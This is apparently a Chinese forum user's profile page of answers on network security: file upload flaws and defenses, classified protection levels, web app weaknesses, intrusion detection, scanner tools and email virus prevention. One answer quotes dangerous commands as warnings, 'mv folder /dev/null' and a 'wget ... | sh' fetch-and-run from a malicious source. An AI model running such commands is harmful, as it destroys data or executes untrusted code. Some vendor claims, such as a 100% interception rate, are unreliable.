<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    齊士忠 的所有回復(718)

    評論于 4個月前,獲得 0 個贊

    文件上傳漏洞是:

    • 文件上傳漏洞是指由于程序員在對用戶文件上傳部分的控制不足或者處理缺陷,而導致的用戶可以越過其本身權限向服務器上上傳可執行的動態腳本文件。這里上傳的文件可以是木馬,病毒,惡意腳本或者WebShell等。“文件上傳”本身沒有問題,有問題的是文件上傳后,服務器怎么處理、解釋文件。如果服務器的處理邏輯做的不夠安全,則會導致嚴重的后果。

    文件上傳漏洞原理:

    • 在文件上傳的功能處,若服務端腳本語言未對上傳的文件進行嚴格驗證和過濾,導致惡意用戶上傳惡意的腳本文件時,就有可能獲取執行服務端命令的能力,這就是文件上傳漏洞。

    • 文件上傳漏洞對Web應用來說是一種非常嚴重的漏洞。一般情況下,Web應用都會允許用戶上傳一些文件,如頭像、附件等信息,如果Web應用沒有對用戶上傳的文件進行有效的檢查過濾,那么惡意用戶就會上傳一句話木馬等Webshell,從而達到控制Web網站的目的。

    文件上傳防御:

    • 上傳文件的存儲目錄不給執行權限

    • 文件后綴白名單,注意0x00截斷攻擊(PHP更新到最新版本)

    • 不能有本地文件包含漏洞(include dama.jpg)

    • 及時更新web應用軟件避免解析漏洞攻擊

    • 對上傳后的文件進行重命名,例如隨機數拼接時間戳.jpg

    評論于 2年前,獲得 0 個贊

    對于新建的信息系統,在系統的設計、規劃階段時就應當按照相應等級的安全保護要求進行建設;對于已建在用的信息系統,則應進行全面的差距評估,找出系統現狀與等級保護標準之間的差距,制定整改方案,并逐一進行安全整改。

    信息系統的安全保護等級確定后,企業就按照有關規范和技術標準,使用符合國家有關規定、滿足信息系統安全保護等級需要的信息技術產品,開展信息系統安全建設或者整改工作。《信息系統安全等級保護基本要求》(GB/T 22239—2015)是安全建設或安全整改的重要依據標準,該標準對每一級別系統安全保護的基本要求進行了描述,包括了技術要求和管理要求。

    新建系統與已建在用的系統,本階段的工作有所不同。對于新建的信息系統,在系統的設計、規劃階段時就應當按照相應等級的安全保護要求進行建設;對于已建在用的信息系統,則應進行全面的差距評估,找出系統現狀與等級保護標準之間的差距,制定整改方案,并逐一進行安全整改。

    評論于 10個月前,獲得 0 個贊

    大數據應用安全比傳統應用安全問題更多原因如下:

    • 大數據集群上線后往往運行各種類型的應用程序(統稱作業),同時這些作業將訪問集群各類軟硬件資源,如CPU、硬盤、網絡、內存以及各類業務數據等,在同一集群下數據、作業、資源的安全訪問及隔離是一個巨大的挑戰;

    • 同一個集群可能多計算框架并存,保證不同應用、相同/不同計算框架間的安全更加困難;

    • 具體到作業權限管理,即如何實現從客戶端接入、作業提交、作業執行、作業監控、作業資源管理等端到端全流程權限控制;

    • 大數據服務眾多,如何打通各個組件間的權限控制,對服務進行安全管理是必須解決的問題;

    • 大數據業務訪問控制,如數據與應用訪問控制、集群管理訪問控制、Web訪問控制,如何對訪問審計等;

    • 大數據用戶的認證、授權及企業已有權限系統與大數據權限控制結合也是個難題;

    • 數據傳遞安全管理,保證數據傳遞過程的安全性。

    評論于 9個月前,獲得 0 個贊

    在部署或更新邊緣站點時應考慮以下問題:

    • 集成基礎設施:如果需要快速部署多個邊緣站點或升級邊緣計算軟件以支持新的應用,那么集成基礎設施應當是首選。目前,集成解決方案范圍從完整的預制模塊化數據中心到全封閉的機架,可以自行定制,滿足各種需求。這些系統都可以根據站點的需求進行定制,包括IT設備運行所需的全部基礎設施(電力、空調系統、安全等),并且允許現場集成、快速部署。

    • 加強電源保護:與數據中心一樣,邊緣位置的可靠性取決于該地區的電力基礎設施。在較小的邊緣位置對機架要有完善的電力保護措施。隨著邊緣數據中心容量、計算能力和重要性的升級,即使小型邊緣數據中心電力結構也部署緊湊型雙UPS系統轉換。該系統能夠濾除功率擾動,例如由電梯電機或電力風暴造成的功率擾動,而不會耗盡電池。這些系統通常能提供更高的可靠性,而且電池的更換頻率低,完全可以替代在線式UPS。

    • 遠程監控:不管是使用集成系統還是離散組件,對邊緣站點的遠程可見性都是監控性能和管理服務的關鍵。UPS中的內置通信卡可以收集操作數據、環境數據,然后送達中央基礎設施監控系統、基礎設施管理系統或建筑管理系統。

    • 零排放冷卻:由于新設備功能越來越多,其功率密度越來越高,曾經依賴建筑空調來維持環境溫度條件已不能滿足,需要專門的散熱管理,在未來可能要將專門的冷卻系統部署到網絡中心和服務器機房。

    • 技術支持:對大多數IT部門來說,能夠為數據中心提供實時技術支持都充滿挑戰,更不要說對那些邊緣站點提供技術支持。許多企業組織都是將技術支持外包,如從計劃安裝及調試、遠程監控和數據分析、預防性維護和更換電池,到應急響應,都實行外包而不是雇傭更多的人員。

    評論于 7個月前,獲得 0 個贊

    網絡安全測評目的包括以下幾個:

    • 確定機構信息資源的機密性、完整性、可用性、可控性和可審查性的具體威脅風險及程度。

    • 通過調研分析弄清網絡系統實際存在的具體漏洞隱患及狀況。

    • 明確與該機構信息資產有關的風險和具體的需要改進之處。

    • 提出改變現狀的具體建議和方案,將風險降低到可接受程度。

    • 為構建合適的安全計劃和策略做好準備。

    • 弄清機構具體信息資產的實際價值及狀況。

    評論于 5個月前,獲得 0 個贊

    網絡安全等級保護是國家信息安全保障的基本制度、基本策略、基本方法。網絡安全等級保護工作是對信息和信息載體按照重要性等級分級別進行保護的一種工作。信息系統運營、使用單位應當選擇符合國家要求的測評機構,依據《信息安全技術網絡安全等級保護基本要求》等技術標準,定期對信息系統開展測評工作。

    等級保護包括以下五個級別:

    • 自主保護級:一般適用于小型私營、個體企業、中小學,鄉鎮所屬信息系統、縣級單位中一般的信息系統。信息系統受到破壞后,會對公民、法人和其他組織的合法權益造成損害,但不損害國家安全、社會秩序和公共利益。

    • 指導保護級:一般適用于縣級其些單位中的重要信息系統;地市級以上國家機關、企事業單位內部一般的信息系統。例如非涉及工作秘密、商業秘密、敏感信息的辦公系統和管理系統等。信息系統受到破壞后,會對公民、法人和其他組織的合法權益產生嚴重損害,或者對社會秩序和公共利益造成損害,但不損害國家安全。

    • 監督保護級:一般適用于地市級以上國家機關、企業、事業單位內部重要的信息系統,例如涉及工作秘密、商業秘密、敏感信息的辦公系統和管理系統;跨省或全國聯網運行的用于生產、調度、管理、指揮、作業、控制等方面的重要信息系統以及這類系統在省、地市的分支系統;中央各部委、省(區、市)門戶網站和重要網站;跨省連接的網絡系統等。信息系統受到破壞后,會對社會秩序和公共利益造成嚴重損害,或者對國家安全造成損害。

    • 強制保護級:一般適用于國家重要領域、重要部門中的特別重要系統以及核心系統。例如電力、電信、廣電、鐵路、民航、銀行、稅務等重要、部門的生產、調度、指揮等涉及國家安全、國計民生的核心系統。信息系統受到破壞后,會對社會秩序和公共利益造成特別嚴重損害,或者對國家安全造成嚴重損害。

    • 專控保護級:一般適用于國家重要領域、重要部門中的極端重要系統。信息系統受到破壞后,會對國家安全造成特別嚴重損害。信息系統安全等級保護的定級準則和等級劃分。

    評論于 2年前,獲得 0 個贊

    看了上面的回答我也想補充幾條,mv 文件夾 /dev/null這個命令會移動某個‘文件夾‘到/dev/null,在Linux中 /dev/nullnull設備是一個特殊的文件,所有寫入它的數據都會被清除,然后返回寫操作成功。當然,要說明的是這個命令并不能阻止數據恢復軟件——所以,真正的徹底毀滅,需要采用專用的軟件或者手法來完成。在一個是wget http://malicious_source -O- | sh這條命令,該命令會從一個惡意源下載一個腳本并執行。Wget命令會下載這個腳本,而sh會(無條件的)執行下載下來的腳本。注意: 你應該時刻注意你下載包或腳本的源。只能使用那些從可信任的源中下載腳本/程序。這條命令現在也不是那么危險,但還是小心為妙。

    評論于 10個月前,獲得 0 個贊

    電子商務網頁安全需要防范以下這些方面:

    • 防范跨網站攻擊:對CSRF攻擊的防御主要有兩種方式。第一種是通過驗證輸入HTTP的Refer報頭,在形成任何HTTP請求時,大多數瀏覽器都會進行配置,以便在一個叫作Refer的HTTP報頭中發送原始URL,如果對它進行檢測,發現它在引用一個第三方域,便可知道這是一個跨網站請求。但這種方式易受瀏覽器限制,因為瀏覽器并不是必須發送這個報頭,而且有些用戶可能會禁用這一功能來保護隱私。第二種方式是要求在敏感請求中包含用戶相關的令牌,如要求用戶在提交表單時輸入用戶的賬號和密碼,但這種方式也給用戶帶來了多余的操作。

    • 防范會話劫持:目前會話保護機制主要有兩種。第一種是通過客戶端IP地址檢查進行防護,這種方式是在Cookie中保存客戶端的IP地址,通過對IP地址的檢測,拒絕與原IP地址不同的任何請求。第二種是通過在Cookie中設置HttpOnly標志進行防護,HttpOnly是Microsoft在瀏覽器中添加的一個安全特性,HttpOnly是一個標志,可以對Cookie進行標記,被標記的Cookie無法用JavaScript獲取,這樣攻擊者就無法利用XSS漏洞獲取用戶的會話。

    • 防范客戶端驗證脆弱性:JavaScript語言的應用使網頁具有互動性,JavaScript的解釋由瀏覽器執行,不需要服務器來解釋,具有反應速度快、功能強大的特點,常用來給HTML網頁添加動態功能,響應用戶的操作。在實際應用中JavaScript常常用來控制表單中的輸入,一個安全的系統不能只依靠客戶端對數據進行驗證,必須將客戶端驗證和服務器端驗證結合起來。

    • 防范SQL注入:一般可以通過白名單的方式防御,白名單驗證是在用戶進一步處理之前驗證輸入是否符合所期望的類型、長度、大小、數字范圍或其他標準。白名單驗證通常利用正則表達式完成,可以從數據類型、數據值、數據范圍、數據內容、數據大小等方面考慮。

    • 防范XSS:不要在允許位置插入不可信數據,在向HTML元素內容插入不可信數據前對HTML解碼,在向HTML常見屬性插入不可信數據前進行屬性解碼,在向HTML URL屬性插入不可信數據前進行URL解碼。

    評論于 9個月前,獲得 0 個贊

    郵件炸彈實質上就是郵件發送者利用偽造的IP地址和特殊的電子郵件軟件,在很短的時間內將大量地址不詳、容量龐大、充滿了亂碼或罵人話的惡意郵件連續不斷地郵寄給同一個收信人,由于每個人的郵件信箱都是有限的,而收件箱在這些數以千萬計的大容量的信件面前肯定是不堪重負,以至造成郵箱超負荷而崩潰。所謂的電子郵件炸彈不過是它所造成的危害是針對電子數據的相對于其他的攻擊手段來說,這可謂是一種最簡單,最有效的攻擊方法。

    預防電子郵件炸彈的措施有以下這些:

    • 謹慎收取電子郵件:在互聯網技術不斷發展的形勢下,病毒傳播方式可謂是五花八門,其中郵件傳播就是最典型的一種。因此局域網內的用戶,在收取郵件的過程中,應注重對郵件的過濾,對于陌生郵件應借助軟件查殺病毒后,確定安全才可以打開。通常情況下,用戶通過網頁登陸的方式可以避免郵件病毒傳播的可能。如果必須要使用客戶端登陸,則一定要開啟防火墻,做好相應的預防措施,防止網絡因遭到病毒攻擊而陷入癱瘓狀態。

    • 合理選擇軟件,及時做好預防:病毒和黑客的預防不能僅僅依賴防火墻,相關單位需要有針對性的安裝一些病毒查殺軟件,對病毒和黑客問題進行抵御。通常情況下單位選擇殺毒軟件應注意以下幾個方面:首先,適當從眾。此處提到的從眾,主要就是指選擇大家都在應用、并且大家都認為有效的軟件。其次,病毒查殺軟件不能安裝過多,通常情況下安裝一個到兩個就可以。在安裝完殺毒軟件后,相關單位還要選取合適的防黑客軟件,這種軟件主要針對遠程入侵本機而設置,能夠對黑客進行很好的防御。

    • 安裝防病毒程序:防御病毒感染的最佳方法就是安裝防病毒掃描程序并及時更新。防病毒程序可以掃描傳入的電子郵件中的已知病毒,并幫助防止這些病毒感染計算機。新病毒幾乎每天都會出現,因此需要確保及時更新防病毒程序。多數防病毒程序都可以設置為定期自動更新,以具備需要與最新病毒進行斗爭的信息。

    • 打開電子郵件附件時要非常小心:電子郵件附件是主要的病毒感染源。例如,用戶可能會收到一封帶有附件的電子郵件(甚至發送者是自己認識的人),該附件被偽裝為文檔、照片或程序,但實際上是病毒。如果打開該文件,病毒就會感染計算機。如果收到意外的電子郵件附件,請考慮在打開附件之前先答復發件人,問清是否確實發送了這些附件。

    • 使用防病毒程序檢查壓縮文件內容:病毒編寫者用于將惡意文件潛入到計算機中的一種方法是使用壓縮文件格式(如.zip或.rar格式)將文件作為附件發送。多數防病毒程序會在接收到附件時進行掃描,但為了安全起見,應該將壓縮的附件保存到計算機的一個文件夾中,在打開其中所包含的任何文件之前先使用防病毒程序進行掃描。

    • 單擊郵件中的鏈接時需謹慎:電子郵件中的欺騙性鏈接通常作為仿冒和間諜軟件騙局的一部分使用,但也會用來傳輸病毒。單擊欺騙性鏈接會打開一個網頁,該網頁將試圖向計算機下載惡意軟件。在決定是否單擊郵件中的鏈接時要小心,尤其是郵件正文看上去含糊不清,如郵件上寫著“查看我們的假期圖片”,但沒有標識用戶或發件人的個人信息。

    評論于 7個月前,獲得 0 個贊

    Web應用系統存在以下這些突出的安全問題:

    • 未驗證參數:Web請求返回的信息沒有經過有效性驗證就提交給Web應用程序使用。攻擊者可以利用返回信息中的缺陷,包括URL、請求字符串、cookie頭部、表單項,隱含參數傳遞代碼攻擊運行Web程序的組件。

    • 訪問控制缺陷:用戶身份認證策略沒有被執行,導致非法用戶可以操作信息。攻擊者可以利用這個漏洞得到其他用戶賬號、瀏覽敏感文件、刪除更改內容,執行未授權的訪問,甚至取得網站管理的權限。

    • 賬戶及會話管理缺陷:賬戶和會話標記未被有效保護。攻擊者可以得到密碼、解密密鑰、會話Cookie和其他標記,并突破用戶權限限制或利用假身份得到其他用戶信任。

    • 跨站腳本漏洞:在遠程Web頁面的html代碼中插入的具有惡意目的的數據,用戶認為該頁面是可信賴的,但是當瀏覽器下載該頁面時,嵌入其中的腳本將被解釋執行。最典型的例子就是論壇處理用戶評論的應用程序,這些有跨站腳本漏洞的應用程序會向客戶端返回其他用戶先前輸入的內容,–些網站的錯誤處理頁面也存在此類問題。瀏覽器收到了嵌入惡意代碼的響應,那么這些惡意代碼就可能被執行。

    • 緩沖區溢出:Web應用組件沒有正確檢驗輸入數據的有效性,倒使數據溢出,并獲得程序的控制權。可能被利用的組件包括CGI,庫文件、驅動文件和Web服務器。

    • 命令注入漏洞:Web應用程序在與外部系統或本地操作系統交互時,需要傳遞參數.如果攻擊者在傳遞的參數中嵌入了惡意代碼,外部系統可能會執行那些指令。比如SQL注入攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字符串,欺騙服務器執行惡意的SQL命令。

    • 錯誤處理問題:在正常操作沒有被有效處理的情況下,會產生錯誤提示,如內存不夠、系統調用失敗、網絡超時等。如果攻擊者人為構造Web應用不能處理的情況,就可能得到一些反饋信息,就有可能從中得到系統的相關信息。系統如何工作這樣重要的信息顯示出來,并且暴露了那些出錯信息背后的隱含意義。例如,當發出請求包試圖判斷-一個文件是否在遠程主機上存在的時候,如果返回信息為“文件未找到”則為無此文件,而如果返回信息為“訪問被拒絕”則為文件存在但無訪問權限。

    • 密碼學使用不當:Web應用經常會使用密碼機制來保護信息存儲和傳輸的安全,比如說開機或文件密碼、銀行賬號、機密文件等。然而這些用于保密用途的程序代碼也可能存在一些安全隱患,這可能是由于開發者的原因造成的。

    • 遠程管理漏洞:許多Web應用允許管理者通過Web接口來對站點實施遠程管理。如果這些管理機制沒有得到有效的管理,攻擊者就可能通過接口擁有站點的全部權限。

    • Web服務器及應用服務器配置不當:對Web應用來說,健壯的服務器是至關重要的。服務器的配置都較復雜,比如Apache服務器的配置文件完全是由命令和注釋組成,一個命令包括若千個參數。如果配置不當對安全性影響最大。

    評論于 2年前,獲得 0 個贊

    按照檢測對象的不同,基于主機的入侵檢測系統可以分為兩類:網絡連接檢測和主機文件檢測。

    1.網絡連接檢測

    網絡連接檢測是對試圖進入該主機的數據流進行檢測,分析確定是否有入侵行為,避免或減少這些數據流進入主機系統后造成損害。

    網絡連接檢測可以有效地檢測出是否存在攻擊探測行為,攻擊探測幾乎是所有攻擊行為的前奏。系統管理員可以設置好訪問控制表,其中包括容易受到攻擊探測的網絡服務,并且為它們設置好訪問權限。如果入侵檢測系統發現有對未開放的服務端口進行網絡連接,說明有人在尋找系統漏洞,這些探測行為就會被入侵檢測系統記錄下來,同時這種未經授權的連接也被拒絕。

    2.主機文件檢測

    通常入侵行為會在主機的各種相關文件中留下痕跡,主機文件檢測能夠幫助系統管理員發現入侵行為或入侵企圖,及時采取補救措施。

    主機文件檢測的檢測對象主要包括以下幾種:

    (1)系統日志。系統日志文件中記錄了各種類型的信息,包括各用戶的行為記錄。如果日志文件中存在異常的記錄,就可以認為已經或正在發生網絡入侵行為。這些異常包括不正常的反復登錄失敗記錄、未授權用戶越權訪問重要文件、非正常登錄行為等。

    (2)文件系統。惡意的網絡攻擊者會修改網絡主機上包含重要信息的各種數據文件,他 們可能會刪除或者替換某些文件,或者盡量修改各種日志記錄來銷毀他們的攻擊行為可能留下的痕跡。如果入侵檢測系統發現文件系統發生了異常的改變,例如一些受限訪問的目錄或文件被非正常地創建、修改或刪除,就可以懷疑發生了網絡入侵行為。

    (3)進程記錄。主機系統中運行著各種不同的應用程序,包括各種服務程序。每個執行中的程序都包含了一個或多個進程。每個進程都存在于特定的系統環境中,能夠訪問有限的系統資源、數據文件等,或者與特定的進程進行通信。黑客可能將程序的進程分解,致使程序中止,或者令程序執行違背系統用戶意圖的操作。如果入侵檢測系統發現某個進程存在著異常的行為,就可以懷疑有網絡入侵。

    評論于 1年前,獲得 0 個贊

    Nikto

    是一個開源的Web服務器掃描程序,它可以對Web服務器的多種項目(包括3500個潛在的危險文件/CGI,以及超過900個服務器版本,還有250多個服務器上的版本特定問題)進行全面的測試。其掃描項目和插件經常更新并且可以自動更新(如果需要的話)

    Paros

    這是一個對Web應用程序的漏洞進行評估的代理程序,即一個基于Java的web代理程序,可以評估Web應用程序的漏洞。

    WebScarab

    它可以分析使用HTTPHTTPS協議進行通信的應用程序,WebScarab可以用最簡單地形式記錄它觀察的會話,并允許操作人員以各種方式觀查會話。如果你需要觀察一個基于HTTP(S)應用程序的運行狀態,那么WebScarab就可以滿足你這種需要。不管是幫助開發人員調試其它方面的難題,還是允許安全專業人員識別漏洞,它都是一款不錯的工具。

    WebInspect

    這是一款強大的Web應用程序掃描程序。SPI Dynamics的這款應用程序安全評估工具有助于確認Web應用中已知的和未知的漏洞。它還可以檢查一個Web服務器是否正確配置,并會嘗試一些常見的Web攻擊,如參數注入、跨站腳本、目錄遍歷攻擊(directory traversal)等等。

    Whisker/libwhisker

    Libwhisker是一個Perla模塊,適合于HTTP測試。它可以針對許多已知的安全漏洞,測試HTTP服務器,特別是檢測危險CGI的存在。Whisker是一個使用libwhisker的掃描程序。

    Burpsuite

    這是一個可以用于攻擊Web應用程序的集成平臺。Burp套件允許一個攻擊者將人工的和自動的技術結合起來,以列舉、分析、攻擊Web應用程序,或利用這些程序的漏洞。各種各樣的burp工具協同工作,共享信息,并允許將一種工具發現的漏洞形成另外一種工具的基礎。

    Wikto

    可以說這是一個Web服務器評估工具,它可以檢查Web服務器中的漏洞,并提供與Nikto一樣的很多功能,但增加了許多有趣的功能部分,如后端miner和緊密的Google集成。它為MS.NET環境編寫,但用戶需要注冊才能下載其二進制文件和源代碼。

    Acunetix Web Vulnerability Scanner

    這是一款商業級的Web漏洞掃描程序,它可以檢查Web應用程序中的漏洞,如SQL注入、跨站腳本攻擊、身份驗證頁上的弱口令長度等。它擁有一個操作方便的圖形用戶界面,并且能夠創建專業級的Web站點安全審核報告。

    Watchfire AppScan

    這也是一款商業類的Web漏洞掃描程序。AppScan在應用程序的整個開發周期都提供安全測試,從而測試簡化了部件測試和開發早期的安全保證。它可以掃描許多常見的漏洞,如跨站腳本攻擊、HTTP響應拆分漏洞、參數篡改、隱式字段處理、后門/調試選項、緩沖區溢出等等。

    N-Stealth

    N-Stealth是一款商業級的Web服務器安全掃描程序。它比一些免費的Web掃描程序,如Whisker/libwhisker、 Nikto等的升級頻率更高,它宣稱含有“30000個漏洞和漏洞程序”以及“每天增加大量的漏洞檢查”,不過這種說法令人質疑。還要注意,實際上所有通用的VA工具,如Nessus, ISS Internet Scanner, Retina, SAINT, Sara等都包含Web 掃描部件。(雖然這些工具并非總能保持軟件更新,也不一定很靈活。)N-Stealth主要為Windows平臺提供掃描,但并不提供源代碼。
    評論于 1年前,獲得 0 個贊

    針對數據的數據庫安全特性包括以下這些:

    • 數據獨立性:包括物理獨立性和邏輯獨立性兩個方面。物理獨立性指用戶的應用程序與存儲在磁盤上的數據庫中的數據是相互獨立的;邏輯獨立性指用戶的應用程序與數據庫的邏輯結構是相互獨立的。

    • 數據安全性:操作系統中的對象一般是文件,而數據庫支持的應用要求更為精細。通常比較完整的數據庫對數據安全性采取以下措施:將數據庫中需要保護的部分與其他部分相隔;采用授權規則,如賬戶、口令和權限控制等訪問控制方法;對數據進行加密后存儲于數據庫。

    • 數據完整性:包括數據的正確性、有效性和一致性。正確性指數據的輸入值與數據表對應域的類型一樣;有效性指數據庫中的理論數值滿足現實應用中對該數值段的約束;一致性指不同用戶使用的同一數據應該是一樣的。保證數據的完整性,需要防止合法用戶使用數據庫時向數據庫中加入不合語義的數據。

    • 并發控制:如果數據庫應用要實現多用戶共享數據,就可能在同一時刻多個用戶要存取數據,這種事件叫作并發事件。當一個用戶取出數據進行修改,在修改存入數據庫之前如有其他用戶再取此數據,那么讀出的數據就是不正確的。這時就需要對這種并發操作施行控制,排除和避免這種錯誤的發生,保證數據的正確性。

    • 故障恢復:由數據庫管理系統提供一套方法,可及時發現故障和修復故障,從而防止數據被破壞。數據庫系統能盡快恢復數據庫系統運行時出現的故障,可能是物理上或是邏輯上的錯誤,如對系統的誤操作造成的數據錯誤等。

    評論于 1年前,獲得 0 個贊

    預防郵件病毒的措施有以下這些:

    • 選擇一款可靠的防毒軟件:要對付病毒郵件,在郵件接收過程中對其進行病毒掃描過濾有害病毒是非常有效的手段。用戶可以借殺毒軟件中的郵件監視功能來實現,設置好郵件監視規則,可以在接收郵件過程中對病毒進行處理,有效防止郵件病毒的侵入。目前對電子郵件最有效的殺毒軟件是卡巴斯基,U-Mail,網易都是采用這一殺毒引擎,攔截率可達到100%。

    • 定期升級病毒庫:特別是防病毒軟件廠商提供的升級服務是非常周到的,其軟件病毒庫都處在時時更新狀態中,廠商會根據最近流行病毒的情況,隨時更新病毒代碼到病毒庫中,如果用戶不及時升級,就很難對新病毒進行查殺,這時就不能怪殺毒軟件找不到病毒了。

    • 識別郵件病毒:一些郵件病毒具有廣泛的共同特征,找出它們的共同點可以防止一部門病毒的破壞。當收到郵件時,先看郵件大小,如果發現郵件中無內容,無附件,郵件自身的大小又有幾十K或者更大,那么此郵件中極有可能包含有病毒,可直接從電腦中冊除,然后再清空廢件箱;記住,下一步的操作非常重要,在清空廢件箱后,一定要壓縮一遍郵箱,不然殺毒軟件在下次查毒時還會報有病毒;如果發現收到的郵件對方地址非常陌生,域名相對極不像正常的國內郵箱,那就很有可能是收到病毒了,這個時候,也可以選擇直接刪除。看附件的后綴名,如果是雙后綴那么極有可能是病毒,因為郵件病毒會選擇隱藏在附件中,直接冊除即可。

    • 讓郵件監視功能起作用:很多用戶在購買了殺毒軟件后,會因為一些原因而不打開實時監控防火墻,因為殺毒軟件在運行中會占用一些系統資源,不過這是不可避免的,就看用戶怎么調節使用了。如果不打開實時監視功能,會讓郵件病毒和其他病毒趁機鉆電腦的空子,沒有保護措施的電腦在病毒面前幾乎沒有抵擋能力。因此,要安全保護電腦,病毒監視功能就一定要運行。

    • 投石問路:當遇到帶有附件的郵件時,如果附件為可執行文件(.exe、.com)或帶有宏功能的word文檔時,不要選擇打開,可以用兩種方法來檢測是否帶有病毒。一種方法是,利用殺毒軟件的郵件病毒監視功能來過濾掉郵件中的病毒。另一種方法是,把附件先另存在硬盤上,然后利用殺毒軟件進行進行查毒。

    • 盡量不在“地址薄”中設置聯系名單:因為一但被病毒感染,病毒會通過郵件“地址薄”中的聯系人來傳播。如果要發送郵件,可以進入收件箱,打開對方發來的郵件,利用“回復”功能來發送新郵件,這么多客戶與朋友,進行回復當然會有點不方便,可以新建一個文本文件,把客戶的郵件地址全都列入其中,要發新郵件的時候,利用復制、粘貼快捷鍵把地址送到收件人欄中,這樣是麻煩了一點,不過可以把最要客戶與朋友的名單列進去,萬一在病毒爆發的時候,也不會造成不必要的損失。用此方法可以避免病毒的擴散,特別是有商業關系的客戶不會因為病毒事件而使公司受到損失。

    • 少使用信紙模塊:大部分郵件收發軟件如中國用戶常用的Foxmail,都提供了信紙模塊,使得人們在發信中可以選擇更美麗的界面,但是,美麗過后隱藏著病毒的威脅。往往信紙模塊都是一些腳本文件,如果模塊感染了腳本病毒例如VBS/KJ、歡樂時光等,那用戶使用信紙發出去的郵件都帶有病毒了。

    • 設置郵箱自動過濾功能:通過WEB上網收發郵件的朋友可以使用郵箱提供的自動過濾郵件功能,這樣不僅能夠防止垃圾郵件,還可以過濾掉一些帶病毒郵件不進行收件箱中,這樣也減少了病毒感染的機會。做法是,把陌生的郵件發送人地址列入自動過濾,以后就不會再有相同地址的郵件出現了。

    • 不使用郵件軟件郵箱中的預覽功能:當今,一些傳播與破壞力比較大的病毒,往往都是通過郵件預覽時進行感染,并不需要打開郵件。如果使用Outlook收發郵件,建議用戶關掉郵箱工具的預覽項;或者升級微軟的最新補丁,可以預防Outlook接收郵件時進行感染。如果使用的是Foxmail,在當前帳戶屬性中模快項選擇純文本格式。

    評論于 6個月前,獲得 0 個贊

    網絡安全體系結構是對網絡信息安全基本問題的應對措施的集合,通常由保護、檢測、響應和恢復等手段構成。對于一個系統而言,首先要以硬件電路等物理設備為載體,然后才能運 行載體上的功能程序。通過使用路由器、集線器、交換機、網線等網絡設備,用戶可以搭建自己所需要的通信網絡,對于小范圍的無線局域網而言,人們可以使用這些設備搭建用戶需要的通信網絡,最簡單的防護方式是對無線路由器設置相應的指令。

    采取以下安全措施可以杜絕網絡安全隱患:

    • 公開服務器的安全保護:將哪些對外服務的服務器加強保護,盡量定期更新系統和對所使用的內部軟件進行安裝補丁,避免被不法分子惡意利用攻擊。同時,需要定期安裝最新的操作系統,減少系統漏洞,提高服務器的安全性。

    • 防止黑客從外部攻擊:安裝防火墻軟件,監視數據流動。要盡量選用最先進的防火墻軟件和硬件,加強外部防護,防止黑客從外部入侵,對來路不明的電子郵件或者附件需要保持警惕,不要隨便打開,盡量使用最新的互聯網瀏覽器軟件和電子郵件系統。

    • 入侵檢測與監控:入侵檢測是指“通過對行為、安全日志或審計數據或其它網絡上可以獲得的信息進行操作,檢測到對系統的闖入或闖入的企圖”。入侵檢測是檢測和響應計算機誤用的學科,其作用包括威懾、檢測、響應、損失情況評估、攻擊預測和起訴支持。入侵檢測系統(IDS)可以被定義為對計算機和網絡資源的惡意使用行為進行識別和相應處理的系統。包括系統外部的入侵和內部用戶的非授權行為,是為保證計算機系統的安全而設計與配置的一種能夠及時發現并報告系統中未授權或異常現象的技術,是一種用于檢測計算機網絡中違反安全策略行為的技術。

    • 信息審計與記錄:對進出內部網絡的信息,為防止或追查可能的泄密行為所進行的實時內容審計。網絡信息內容審計與信息檢索等研究具有一定相似性,兩者均以文本為主要的處理對象,都按照一定規則進行分析并得出有益的結果。但兩者也存在較大區別,在系統模型、數據源、分析規則、應用需求等方面存在差異。網絡信息內容審計涵蓋了計算機網絡、自然語言處理、數據挖掘、人工智能、復雜網絡等多個學科領域。

    • 病毒防護:防病毒指用戶主動性的防范電腦等電子設備不受病毒入侵,從而避免用戶資料泄露、設備程序被破壞等情況的出現。病毒潛伏在計算機中,即使還沒有開始發作也總會留下一些“蛛絲馬跡”。用戶要想知道自己的計算機是否感染有病毒,最簡單易行的方法就是使用反病毒軟件對磁盤進行全面的檢測。如果要想檢測出最新的病毒,則必須保證自己使用的反病毒軟件的病毒碼得到了及時的更新(也就是使用最新版的殺毒軟件并及時升級)。如果手頭沒有反病毒軟件,則可根據下列計算機中毒后所引起的系統異常癥狀來做出初步的判斷。

    • 數據安全保護:數據安全保護系統是依據國家重要信息系統安全等級保護標準和法規,以及企業數字知識產權保護需求,自主研發的產品。它以全面數據文件安全策略、加解密技術與強制訪問控制有機結合為設計思想,對信息媒介上的各種數據資產,實施不同安全等級的控制,有效杜絕機密信息泄漏和竊取事件。

    • 數據備份與恢復:數據備份就是將數據庫的內容全部復制出來保存到計算機的另一個位置或者其他存儲設備上。數據庫備份也有很多種,主要有物理備份和邏輯備份。物理備份對數據庫的操作系統物理文件(如數據文件、控制文件和日志文件等)的備份邏輯備份對數據庫邏輯組件(如表、視圖和存儲過程等數據庫對象)的備份。什么是數據恢復數據恢復就是把從數據庫中備份出來的數據重新還原給原來的數據庫。

    • 網絡的安全管理:網絡安全管理是保護網絡安全的一種方法,計算機網絡是人們通過現代信息技術手段了解社會、獲取信息的重要手段和途徑。網絡安全管理是人們能夠安全上網、綠色上網、健康上網的根本保證。

    6 聲望
    文章
    0
    粉絲
    0
    喜歡
    0
    亚洲 欧美 自拍 唯美 另类